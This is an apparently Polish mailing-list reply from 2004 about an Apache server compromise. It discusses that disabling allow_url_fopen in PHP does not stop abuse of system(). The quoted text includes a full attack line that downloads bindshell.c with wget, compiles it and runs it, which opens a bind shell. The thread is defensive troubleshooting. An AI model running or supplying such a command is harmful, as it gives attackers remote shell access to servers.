bindtty.c

Adam Byrtek / alpha Wed, 18 Feb 2004 08:28:20 -0600

On Wed, Feb 18, 2004 at 12:45:05PM +0100, Tomasz T. Ciaszczyk wrote:
> system("cd tmp;wget http://www.rootshell.com/bindshell.c;gcc 
> bindshell.c;./a.out");
...
> - zablokowanie fopena na zewnatrz w php (allow_url_fopen = Off)


To dobry pomysl, ale nie chroni przed tym, o czym sam wspomniales,
czyli uzyciem system(), jesli taka mozliwosc istnieje.

-- 

  _.|._ |_  _.   :  Adam Byrtek /alpha               [EMAIL PROTECTED]
 (_|||_)| |(_|   :                                   pgp 0xB25952C0
     |

signature.asc
Description: Digital signature

Re: debian stable, apache i http://geocities.com/s3xmelayu/bindtty.c

Odpowiedź listem elektroniczym